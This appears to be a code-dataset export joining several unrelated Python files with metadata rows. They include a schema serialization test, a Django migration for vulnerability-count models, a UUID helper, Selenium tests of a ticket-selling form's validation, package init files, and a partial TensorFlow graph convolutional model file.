        genres=["genres"],
        collections=["collections"],
        actors=[Actor(name="name", role="role")],
        season_summary={1: "Season 1 Summary"}
    )
    expected_full = {
        "title": "title",
        "sort_title": "sort_title",
        "original_title": "original_title",
        "content_rating": "content_rating",
        "tagline": ["tagline"],
        "studio": ["studio"],
        "aired": "2018-01-01",
        "summary": "summary",
        "rating": 1,
        "genres": ["genres"],
        "collections": ["collections"],
        # Actor's unset photo field is serialized explicitly as None.
        "actors": [{"name": "name", "role": "role", "photo": None}],
        "season_summary": {1: "Season 1 Summary"}
    }
    assert show_strict_schema.dump(populated) == expected_full

    # Dumping is not validated: a default Show still serializes cleanly.
    expected_empty = {
        "title": None,
        "sort_title": None,
        "original_title": None,
        "content_rating": None,
        "tagline": [],
        "studio": [],
        "aired": None,
        "summary": None,
        "rating": None,
        "genres": [],
        "collections": [],
        "actors": [],
        "season_summary": {}
    }
    assert show_strict_schema.dump(Show()) == expected_empty
| 27.523605
| 71
| 0.500234
| 569
| 6,413
| 5.465729
| 0.072056
| 0.057878
| 0.076527
| 0.063666
| 0.898392
| 0.869453
| 0.823794
| 0.823794
| 0.789389
| 0.759807
| 0
| 0.018727
| 0.333853
| 6,413
| 232
| 72
| 27.642241
| 0.70927
| 0
| 0
| 0.86036
| 0
| 0
| 0.280992
| 0
| 0
| 0
| 0
| 0
| 0.036036
| 1
| 0.018018
| false
| 0
| 0.018018
| 0
| 0.036036
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f32c65987adac3b4d47312c0171c6e65ee072c5a
| 2,798
|
py
|
Python
|
blackbox/backoffice/migrations/0021_codeanalyse_qualysanalyse.py
|
Security-As-A-Service/Cloud-Security-SaaS
|
0a56d231e5184e6923e81c11b7dfdb7b06ad76d7
|
[
"MIT"
] | 1
|
2019-03-19T05:21:55.000Z
|
2019-03-19T05:21:55.000Z
|
blackbox/backoffice/migrations/0021_codeanalyse_qualysanalyse.py
|
Security-As-A-Service/Cloud-Security-SaaS
|
0a56d231e5184e6923e81c11b7dfdb7b06ad76d7
|
[
"MIT"
] | null | null | null |
blackbox/backoffice/migrations/0021_codeanalyse_qualysanalyse.py
|
Security-As-A-Service/Cloud-Security-SaaS
|
0a56d231e5184e6923e81c11b7dfdb7b06ad76d7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-24 23:08
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration (Django 1.11.5): creates the CodeAnalyse and
    # QualysAnalyse tables. The two models share an identical column layout;
    # only the model name differs.

    dependencies = [
        ('backoffice', '0020_auto_20170924_2354'),
    ]

    operations = [
        migrations.CreateModel(
            name='CodeAnalyse',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('nbr_Day', models.IntegerField(default=0)),
                ('start_date', models.DateTimeField()),
                # NOTE: default='null' is the literal string "null", not SQL NULL,
                # and is not one of the declared choice codes.
                ('auditor', models.CharField(choices=[('BF', 'Beijaflore'), ('Nes', 'Nes'), ('Gfi', 'Gfi'), ('ISPL', 'ISPL'), ('AST', 'AppSecTeam')], default='null', max_length=15)),
                ('pilote', models.CharField(choices=[('dla', 'Damien Lallement'), ('ala', 'Alexandre Lasnier'), ('...', '...')], default='null', max_length=15)),
                # Vulnerability counters, broken down by severity.
                ('total_vulnerability', models.IntegerField(default=0)),
                ('critical_vulnerability', models.IntegerField(default=0)),
                ('high_vulnerability', models.IntegerField(default=0)),
                ('medium_vulnerability', models.IntegerField(default=0)),
                ('low_vulnerability', models.IntegerField(default=0)),
                # Deleting the target AppList row cascades to these analyses.
                ('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='backoffice.AppList')),
            ],
        ),
        migrations.CreateModel(
            name='QualysAnalyse',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('nbr_Day', models.IntegerField(default=0)),
                ('start_date', models.DateTimeField()),
                # Same choice/default caveats as CodeAnalyse.auditor above.
                ('auditor', models.CharField(choices=[('BF', 'Beijaflore'), ('Nes', 'Nes'), ('Gfi', 'Gfi'), ('ISPL', 'ISPL'), ('AST', 'AppSecTeam')], default='null', max_length=15)),
                ('pilote', models.CharField(choices=[('dla', 'Damien Lallement'), ('ala', 'Alexandre Lasnier'), ('...', '...')], default='null', max_length=15)),
                ('total_vulnerability', models.IntegerField(default=0)),
                ('critical_vulnerability', models.IntegerField(default=0)),
                ('high_vulnerability', models.IntegerField(default=0)),
                ('medium_vulnerability', models.IntegerField(default=0)),
                ('low_vulnerability', models.IntegerField(default=0)),
                ('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='backoffice.AppList')),
            ],
        ),
    ]
| 54.862745
| 182
| 0.585061
| 266
| 2,798
| 6.018797
| 0.334586
| 0.134916
| 0.187383
| 0.194878
| 0.814491
| 0.814491
| 0.814491
| 0.814491
| 0.814491
| 0.814491
| 0
| 0.027583
| 0.235525
| 2,798
| 50
| 183
| 55.96
| 0.720898
| 0.024303
| 0
| 0.744186
| 1
| 0
| 0.208654
| 0.024569
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.069767
| 0
| 0.139535
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f35a7f7237ff4a7610d8c52c57038b43a701a4d1
| 167
|
py
|
Python
|
nbmetalog/get_session_uuid.py
|
mmore500/nbmetalog
|
670f8ad76a587d8848c81e4f790c31c96402f8b0
|
[
"MIT"
] | null | null | null |
nbmetalog/get_session_uuid.py
|
mmore500/nbmetalog
|
670f8ad76a587d8848c81e4f790c31c96402f8b0
|
[
"MIT"
] | 1
|
2021-09-02T16:08:58.000Z
|
2021-09-02T16:08:58.000Z
|
nbmetalog/get_session_uuid.py
|
mmore500/nbmetalog
|
670f8ad76a587d8848c81e4f790c31c96402f8b0
|
[
"MIT"
] | null | null | null |
from functools import lru_cache
import uuid
from . import _except_return_none
@lru_cache()
@_except_return_none
def get_session_uuid():
    """Return a random UUID string; lru_cache makes it stable for the process.

    The ``_except_return_none`` wrapper converts any exception into ``None``.
    """
    session_id = uuid.uuid4()
    return str(session_id)
| 16.7
| 33
| 0.790419
| 25
| 167
| 4.88
| 0.56
| 0.131148
| 0.262295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006897
| 0.131737
| 167
| 9
| 34
| 18.555556
| 0.834483
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0.428571
| 0.142857
| 0.714286
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
45ee2aadc4de031f3588c2f6b5b6f76945d5cead
| 10,427
|
py
|
Python
|
CI-Python/qa327_test/frontend/test_sell.py
|
michael-fourie/Mags_Co
|
b9c8ae1730fabde3da95ed0f271ff061505a06c2
|
[
"MIT"
] | 3
|
2020-11-06T21:54:57.000Z
|
2020-12-10T22:06:24.000Z
|
CI-Python/qa327_test/frontend/test_sell.py
|
michael-fourie/Mags_Co
|
b9c8ae1730fabde3da95ed0f271ff061505a06c2
|
[
"MIT"
] | 3
|
2020-11-30T01:04:41.000Z
|
2020-12-13T19:29:45.000Z
|
CI-Python/qa327_test/frontend/test_sell.py
|
michael-fourie/Mags_Co
|
b9c8ae1730fabde3da95ed0f271ff061505a06c2
|
[
"MIT"
] | 3
|
2020-11-23T19:25:41.000Z
|
2022-02-04T15:18:19.000Z
|
import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User, Form, Ticket
from werkzeug.security import generate_password_hash, check_password_hash
import requests
"""
This file defines all unit tests for the frontend selling functionality.
"""
# Mock a sample user
test_user = User(
email='test_frontend@test.com',
name='test_frontend',
password=generate_password_hash('Test_frontend@'),
balance="500"
)
# Mock some sample tickets
test_ticket = Ticket(
name='t1',
price="100",
quantity="2",
email='test123@email.com',
date='02/23/2020'
)
test_tickets = [
Ticket(name='t1', price="100", quantity="2", email='test1@email.com', date='20200223'),
Ticket(name='t2', price="110", quantity="10", email='test2@gmail.com', date='20200314')
]
class FrontEndSellTest(BaseCase):
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
@patch('qa327.backend.get_all_tickets', return_value=test_tickets)
def test_sell_ticket_name_alnum(self, *_):
"""The name of the ticket has to be alphanumeric-only, and space allowed only if its nit
the first or last character
R4.1
"""
#logout to invalidate any logged in session
self.open(base_url + '/logout')
#login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
#open the base url
self.open(base_url)
#Enter an invalid ticket name
self.type('#name_sell', " invalid ")
self.type("#price_sell", "100")
self.type("#quantity_sell", "2")
self.type("#exp_date_sell", "20200921")
self.click('#submit-sell')
#Assert that the valid error message is shown.
self.assert_text("Invalid spaces found in word", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_name_length(self, *_):
"""The name if the ticket is no longer than 60 characters
R4.2
"""
# logout to invalidate any logged in session
self.open(base_url + '/logout')
# login a user
self.open(base_url + '/login')
# fill email and password
self.type("#email", "test_frontend@test.com")
self.type("#password", "Test_frontend@")
# click enter button
self.click('input[type="submit"]')
# open the /sell route
self.open(base_url)
# Enter an invalid ticket name
self.type('#name_sell', "thisnamewillbewaytoolongforitevertobevalidihopeimeanwhatticketwilleverneedanamethatsthislongisthisoversixtycharactersyetidontknowbutletshopeso")
self.type("#price_sell", "100")
self.type("#quantity_sell", "2")
self.type("#exp_date_sell", "20200921")
self.click('#submit-sell')
# Assert that the valid error message is shown.
self.assert_text("Ticket name is too long", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_valid_quantity(self, *_):
    """The quantity of the tickets has to be more than 0, and less than
    or equal to 100.
    R4.3
    """
    # Try one value below the range and one above it; each round starts
    # from a fresh session exactly as the original two passes did.
    for bad_quantity in ("-1", "101"):
        # Reset any logged-in session, then log back in.
        self.open(base_url + '/logout')
        self.open(base_url + '/login')
        self.type("#email", "test_frontend@test.com")
        self.type("#password", "Test_frontend@")
        self.click('input[type="submit"]')
        # Submit the sell form with the out-of-range quantity.
        self.open(base_url)
        self.type('#name_sell', "ticketname")
        self.type('#quantity_sell', bad_quantity)
        self.type("#price_sell", "15")
        self.type("#exp_date_sell", "20200921")
        self.click('#submit-sell')
        # The quantity error must be displayed.
        self.assert_text("Invalid quantity of tickets", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_price_range(self, *_):
    """The price has to be of range [10,100].
    R4.4
    """
    # Check both sides of the allowed range: above 100, then below 10.
    for bad_price in ("101", "9"):
        # Fresh session per attempt, as in the original two passes.
        self.open(base_url + '/logout')
        self.open(base_url + '/login')
        self.type("#email", "test_frontend@test.com")
        self.type("#password", "Test_frontend@")
        self.click('input[type="submit"]')
        # Submit the sell form with the out-of-range price.
        self.open(base_url)
        self.type('#name_sell', "testticket")
        self.type("#quantity_sell", "1")
        self.type("#price_sell", bad_price)
        self.click('#submit-sell')
        # The price error must be displayed.
        self.assert_text("Ticket price outside of valid range", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_valid_date(self, *_):
    """Date must be given in the format YYYYMMDD (e.g. 20200901).
    R4.5
    """
    # Invalidate any existing session and authenticate again.
    self.open(base_url + '/logout')
    self.open(base_url + '/login')
    self.type("#email", "test_frontend@test.com")
    self.type("#password", "Test_frontend@")
    self.click('input[type="submit"]')
    # Submit a date in MMDDYYYY order, which violates the YYYYMMDD format.
    self.open(base_url)
    self.type('#name_sell', "ticketname")
    self.type("#price_sell", "10")
    self.type("#quantity_sell", "1")
    self.type("#exp_date_sell", "09212020")
    self.click('#submit-sell')
    # The date-format error must be displayed.
    self.assert_text("Invalid ticket date", "#message")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
def test_sell_ticket_redirect_on_error(self, *_):
    """For any errors, redirect back to / and show an error message.
    R4.6
    """
    # Invalidate any existing session and authenticate again.
    self.open(base_url + '/logout')
    self.open(base_url + '/login')
    self.type("#email", "test_frontend@test.com")
    self.type("#password", "Test_frontend@")
    self.click('input[type="submit"]')
    # Every field is deliberately invalid: bad name, price, quantity, date.
    self.open(base_url)
    self.type('#name_sell', " invalid ")
    self.type("#price_sell", "1")
    self.type("#quantity_sell", "0")
    self.type("#exp_date_sell", "09212020")
    self.click('#submit-sell')
    # Landing back on the profile page proves the redirect to /.
    self.assert_element("#welcome-header")
    self.assert_text("Hi test_frontend", "#welcome-header")
@patch('qa327.backend.get_user', return_value=test_user)
@patch('qa327.backend.get_ticket', return_value=test_ticket)
@patch('qa327.backend.get_all_tickets', return_value=test_tickets)
@patch('qa327.backend.sell_ticket', return_value=None)
def test_sell_ticket_posted(self, *_):
    """The added new ticket information will be posted on the user
    profile page.
    R4.7
    """
    # Invalidate any existing session and authenticate again.
    self.open(base_url + '/logout')
    self.open(base_url + '/login')
    self.type("#email", "test_frontend@test.com")
    self.type("#password", "Test_frontend@")
    self.click('input[type="submit"]')
    # Submit a fully valid ticket; the mocked backend accepts the sale.
    self.open(base_url)
    self.type('#name_sell', "t1")
    self.type("#price_sell", "100")
    self.type("#quantity_sell", "2")
    self.type("#exp_date_sell", "20200921")
    self.click('#submit-sell')
    # After posting we should be back on the profile page.
    self.assert_element("#welcome-header")
    self.assert_text("Hi test_frontend", "#welcome-header")
| 39.052434
| 177
| 0.624245
| 1,331
| 10,427
| 4.740045
| 0.13148
| 0.065938
| 0.051355
| 0.064194
| 0.790458
| 0.782691
| 0.782691
| 0.779363
| 0.768585
| 0.763512
| 0
| 0.028757
| 0.246284
| 10,427
| 266
| 178
| 39.199248
| 0.774017
| 0.22739
| 0
| 0.713376
| 0
| 0
| 0.31874
| 0.099057
| 0
| 0
| 0
| 0
| 0.070064
| 1
| 0.044586
| false
| 0.070064
| 0.044586
| 0
| 0.095541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
45f93a2bda07de8f4abd899242db5be0fc3605b8
| 217
|
py
|
Python
|
flatdata-py/flatdata/lib/__init__.py
|
heremaps/flatdata
|
42e62c00a25d9b65930c90044578a583efb6ed6d
|
[
"Apache-2.0"
] | 140
|
2018-01-26T21:59:38.000Z
|
2022-02-17T10:23:29.000Z
|
flatdata-py/flatdata/lib/__init__.py
|
VeaaC/flatdata
|
5df78d89938dbbd1566fa85d417b9674ef402561
|
[
"Apache-2.0"
] | 114
|
2018-01-26T17:49:20.000Z
|
2021-11-26T13:27:08.000Z
|
flatdata-py/flatdata/lib/__init__.py
|
VeaaC/flatdata
|
5df78d89938dbbd1566fa85d417b9674ef402561
|
[
"Apache-2.0"
] | 22
|
2018-01-26T16:51:24.000Z
|
2021-04-27T13:32:44.000Z
|
from . import structure
from . import resources
from . import archive
from . import archive_builder
from . import file_resource_writer
from . import errors
from . import resource_storage
from . import flatdata_writer
| 24.111111
| 34
| 0.815668
| 29
| 217
| 5.931034
| 0.413793
| 0.465116
| 0.197674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147465
| 217
| 8
| 35
| 27.125
| 0.92973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
45fb72d016214e16e99543cf110011604a9f8891
| 140
|
py
|
Python
|
maskflow/utils/__init__.py
|
hadim/maskflow
|
6a70725ba26c6e65189936fd5c242c5ab15d6952
|
[
"BSD-3-Clause"
] | 3
|
2018-11-03T20:01:12.000Z
|
2019-05-20T12:57:51.000Z
|
maskflow/utils/__init__.py
|
hadim/maskflow
|
6a70725ba26c6e65189936fd5c242c5ab15d6952
|
[
"BSD-3-Clause"
] | null | null | null |
maskflow/utils/__init__.py
|
hadim/maskflow
|
6a70725ba26c6e65189936fd5c242c5ab15d6952
|
[
"BSD-3-Clause"
] | null | null | null |
from .download import download_zip
from .download import download_file
from .archive import user_data_dir
from .archive import open_archive
| 28
| 35
| 0.857143
| 21
| 140
| 5.47619
| 0.47619
| 0.208696
| 0.313043
| 0.452174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 140
| 4
| 36
| 35
| 0.927419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
346894f243d80fc70f671a8b3e29acf9c489fc8a
| 16,307
|
py
|
Python
|
Code_models.py
|
KampfWut/MORE
|
2b42764812becfa29e0f32f033427e76d5dfe9a0
|
[
"MIT"
] | 2
|
2021-09-30T01:18:23.000Z
|
2021-12-08T06:04:43.000Z
|
Code_models.py
|
KampfWut/MORE
|
2b42764812becfa29e0f32f033427e76d5dfe9a0
|
[
"MIT"
] | null | null | null |
Code_models.py
|
KampfWut/MORE
|
2b42764812becfa29e0f32f033427e76d5dfe9a0
|
[
"MIT"
] | null | null | null |
#-------------------------- import package --------------------------#
from Code_layers import *
from Code_metrics import *
#-------------------------- global variable --------------------------#
# TF1-style command-line flag registry. Hyperparameters such as
# FLAGS.learning_rate, FLAGS.hidden1 and FLAGS.weight_decay are read
# from this module-level FLAGS object by every model class below.
# NOTE(review): `tf` is presumably brought in by the star imports above
# (Code_layers / Code_metrics) — confirm against those modules.
flags = tf.app.flags
FLAGS = flags.FLAGS
#--------------------------- main function ---------------------------#
class Model(object):
"""Base class for TF1-style graph models.

Subclasses implement _build() (append layers to self.layers), _loss()
and _accuracy(); build() then chains the layer stack, collects the
graph variables and creates the optimizer step.
Accepted keyword arguments: 'name' (defaults to the lowercased class
name) and 'logging' (defaults to False).
"""
def __init__(self, **kwargs):
# Reject any keyword other than 'name' / 'logging'.
allowed_kwargs = {'name', 'logging'}
for kwarg in kwargs.keys():
assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg
name = kwargs.get('name')
if not name:
# Default the variable-scope name to the subclass name.
name = self.__class__.__name__.lower()
self.name = name
logging = kwargs.get('logging', False)
self.logging = logging
# Populated by build(): variable name -> variable object.
self.vars = {}
self.placeholders = {}
self.layers = []
self.activations = []
self.inputs = None
self.outputs = None
self.emb = None
self.loss = 0
self.accuracy = 0
self.optimizer = None
self.opt_op = None
def _build(self):
# Subclass hook: must append the model's layers to self.layers.
raise NotImplementedError
def build(self):
""" Wrapper for _build() """
with tf.variable_scope(self.name):
self._build()
# Build sequential layer model
self.activations.append(self.inputs)
for layer in self.layers:
hidden = layer(self.activations[-1])
self.activations.append(hidden)
self.outputs = self.activations[-1]
# The second-to-last activation is kept as the node embedding.
self.emb = self.activations[-2]
# Store model variables for easy access
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
self.vars = {var.name: var for var in variables}
# Build metrics
self._loss()
self._accuracy()
self.opt_op = self.optimizer.minimize(self.loss)
def predict(self):
# Default: no prediction op; subclasses return a softmax over outputs.
pass
def _loss(self):
raise NotImplementedError
def _accuracy(self):
raise NotImplementedError
def save(self, sess=None):
# Checkpoint self.vars to tmp/<name>.ckpt; requires a live session.
if not sess:
raise AttributeError("TensorFlow session not provided.")
saver = tf.train.Saver(self.vars)
save_path = saver.save(sess, "tmp/%s.ckpt" % self.name)
print("Model saved in file: %s" % save_path)
def load(self, sess=None):
# Restore self.vars from tmp/<name>.ckpt; requires a live session.
if not sess:
raise AttributeError("TensorFlow session not provided.")
saver = tf.train.Saver(self.vars)
save_path = "tmp/%s.ckpt" % self.name
saver.restore(sess, save_path)
print("Model restored from file: %s" % save_path)
class MLP(Model):
"""Two-layer dense baseline: Dense(relu) -> Dense(identity).

Loss is L2 weight decay on the first layer's variables plus masked
softmax cross-entropy; trained with Adam at FLAGS.learning_rate.
"""
def __init__(self, placeholders, input_dim, **kwargs):
super(MLP, self).__init__(**kwargs)
self.inputs = placeholders['features']
self.input_dim = input_dim
# self.input_dim = self.inputs.get_shape().as_list()[1] # To be supported in future Tensorflow versions
# Number of label classes, taken from the labels placeholder shape.
self.output_dim = placeholders['labels'].get_shape().as_list()[1]
self.placeholders = placeholders
self.optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate)
self.build()
def _loss(self):
# Weight decay loss
for var in self.layers[0].vars.values():
self.loss += FLAGS.weight_decay * tf.nn.l2_loss(var)
# Cross entropy error
self.loss += masked_softmax_cross_entropy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _accuracy(self):
self.accuracy = masked_accuracy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _build(self):
# Hidden layer: sparse features -> FLAGS.hidden1 units with ReLU.
self.layers.append(Dense(input_dim=self.input_dim,
output_dim=FLAGS.hidden1,
placeholders=self.placeholders,
act=tf.nn.relu,
dropout=True,
sparse_inputs=True,
logging=self.logging))
# Output layer: linear activation; softmax is applied in predict().
self.layers.append(Dense(input_dim=FLAGS.hidden1,
output_dim=self.output_dim,
placeholders=self.placeholders,
act=lambda x: x,
dropout=True,
logging=self.logging))
def predict(self):
return tf.nn.softmax(self.outputs)
class GCN(Model):
"""Two-layer graph convolutional network (Kipf & Welling style stack).

Identical training setup to MLP, but uses GraphConvolution layers:
GraphConvolution(relu) -> GraphConvolution(identity).
"""
def __init__(self, placeholders, input_dim, **kwargs):
super(GCN, self).__init__(**kwargs)
self.inputs = placeholders['features']
self.input_dim = input_dim
# self.input_dim = self.inputs.get_shape().as_list()[1] # To be supported in future Tensorflow versions
# Number of label classes, taken from the labels placeholder shape.
self.output_dim = placeholders['labels'].get_shape().as_list()[1]
self.placeholders = placeholders
self.optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate)
self.build()
def _loss(self):
# Weight decay loss
for var in self.layers[0].vars.values():
self.loss += FLAGS.weight_decay * tf.nn.l2_loss(var)
# Cross entropy error
self.loss += masked_softmax_cross_entropy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _accuracy(self):
self.accuracy = masked_accuracy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _build(self):
# Hidden layer: sparse features -> FLAGS.hidden1 units with ReLU.
self.layers.append(GraphConvolution(input_dim=self.input_dim,
output_dim=FLAGS.hidden1,
placeholders=self.placeholders,
act=tf.nn.relu,
dropout=True,
sparse_inputs=True,
logging=self.logging))
# Output layer: linear activation; softmax is applied in predict().
self.layers.append(GraphConvolution(input_dim=FLAGS.hidden1,
output_dim=self.output_dim,
placeholders=self.placeholders,
act=lambda x: x,
dropout=True,
logging=self.logging))
def predict(self):
return tf.nn.softmax(self.outputs)
class MORE(Model):
"""Motif-aware model with two parallel embedding branches.

_build() creates, in order: a property-embedding stack of
GraphConvolution layers over 'features', a motif-embedding stack of
GraphConvolutionMotifs layers over 'motiffeatures', optional
integration GraphConvolution layers, and a final linear output layer.
build() is overridden to run the two branches separately, merge them
(Hadamard product / element-wise sum / concatenation, chosen by
FLAGS.embeding_combination_method), then apply integration + output.
"""
def __init__(self, placeholders, input_dim, **kwargs):
super(MORE, self).__init__(**kwargs)
self.inputs = placeholders['features']
# Second input branch: per-node motif features.
self.motifinputs = placeholders['motiffeatures']
self.input_dim = input_dim
# self.input_dim = self.inputs.get_shape().as_list()[1] # To be supported in future Tensorflow versions
self.output_dim = placeholders['labels'].get_shape().as_list()[1]
self.placeholders = placeholders
self.optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate)
self.build()
def _loss(self):
# Weight decay loss
for var in self.layers[0].vars.values():
self.loss += FLAGS.weight_decay * tf.nn.l2_loss(var)
# Cross entropy error
self.loss += masked_softmax_cross_entropy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _accuracy(self):
self.accuracy = masked_accuracy(self.outputs, self.placeholders['labels'],
self.placeholders['labels_mask'])
def _build(self):
# property_embedding layer
# Only the first layer consumes sparse inputs; tanh throughout.
for i in range(0, len(FLAGS.property_embedding_hidden)):
if i == 0:
# print(">> property_embedding Layer-{} dim: {} -> {}".format(i, self.input_dim, FLAGS.property_embedding_hidden[i]))
self.layers.append(GraphConvolution(input_dim=self.input_dim,
output_dim=FLAGS.property_embedding_hidden[i],
placeholders=self.placeholders,
act=tf.nn.tanh,
dropout=True,
sparse_inputs=True,
logging=self.logging))
else:
# print(">> property_embedding Layer-{} dim: {} -> {}".format(i, FLAGS.property_embedding_hidden[i-1], FLAGS.property_embedding_hidden[i]))
self.layers.append(GraphConvolution(input_dim=FLAGS.property_embedding_hidden[i-1],
output_dim=FLAGS.property_embedding_hidden[i],
placeholders=self.placeholders,
act=tf.nn.tanh,
dropout=True,
sparse_inputs=False,
logging=self.logging))
# motif_embedding layer
for i in range(0, len(FLAGS.motif_embedding_hidden)):
if i == 0:
# print(">> motif_embedding Layer-{} dim: {} -> {}".format(i, FLAGS.motif_feature_dim, FLAGS.motif_embedding_hidden[i]))
self.layers.append(GraphConvolutionMotifs(input_dim=FLAGS.motif_feature_dim,
output_dim=FLAGS.motif_embedding_hidden[i],
placeholders=self.placeholders,
act=tf.nn.tanh,
dropout=True,
sparse_inputs=True,
logging=self.logging))
else:
# print(">> motif_embedding Layer-{} dim: {} -> {}".format(i, FLAGS.motif_embedding_hidden[i-1], FLAGS.motif_embedding_hidden[i]))
self.layers.append(GraphConvolutionMotifs(input_dim=FLAGS.motif_embedding_hidden[i-1],
output_dim=FLAGS.motif_embedding_hidden[i],
placeholders=self.placeholders,
act=tf.nn.tanh,
dropout=True,
sparse_inputs=False,
logging=self.logging))
# Judge embedding dim
# Both branches must end at the same width so they can be merged.
if FLAGS.property_embedding_hidden[-1] != FLAGS.motif_embedding_hidden[-1]:
raise Exception('[ERROR] embedding last layer not have same dim!')
if FLAGS.embeding_combination_method == "Connection":
# Concatenation doubles the merged width.
embedding_dim = FLAGS.property_embedding_hidden[-1] * 2
else:
embedding_dim = FLAGS.property_embedding_hidden[-1]
# Integration layer
for i in range(0, len(FLAGS.integration_hidden)):
if i == 0:
# print(">> Integration Layer-{} dim: {} -> {}".format(i, embedding_dim, FLAGS.integration_hidden[i]))
self.layers.append(GraphConvolution(input_dim=embedding_dim,
output_dim=FLAGS.integration_hidden[i],
placeholders=self.placeholders,
act=tf.nn.relu,
dropout=True,
sparse_inputs=False,
logging=self.logging))
else:
# print(">> Integration Layer-{} dim: {} -> {}".format(i, FLAGS.integration_hidden[i-1], FLAGS.integration_hidden[i]))
self.layers.append(GraphConvolution(input_dim=FLAGS.integration_hidden[i-1],
output_dim=FLAGS.integration_hidden[i],
placeholders=self.placeholders,
act=tf.nn.relu,
dropout=True,
sparse_inputs=False,
logging=self.logging))
# Judge output layer input dim
if len(FLAGS.integration_hidden) == 0:
out_dim = embedding_dim
else:
out_dim = FLAGS.integration_hidden[-1]
# Output
# print(">> Output Layer dim: {} -> {}".format(out_dim, self.output_dim))
self.layers.append(GraphConvolution(input_dim=out_dim,
output_dim=self.output_dim,
placeholders=self.placeholders,
act=lambda x: x,
dropout=True,
logging=self.logging))
def build(self):
""" Wrapper for _build() """
with tf.variable_scope(self.name):
self._build()
# Build sequential layer model
# 1. property_embedding_hidden layer
self.activations.append(self.inputs)
for i in range(0, len(FLAGS.property_embedding_hidden)):
# print(">> Input shape: {}".format(self.activations[-1].get_shape()))
layer = self.layers[i]
hidden = layer(self.activations[-1])
self.activations.append(hidden)
property_embedding = self.activations[-1]
# print("   property_embedding shape: {}".format(property_embedding.get_shape()))
# 2. motif_embedding_hidden layer
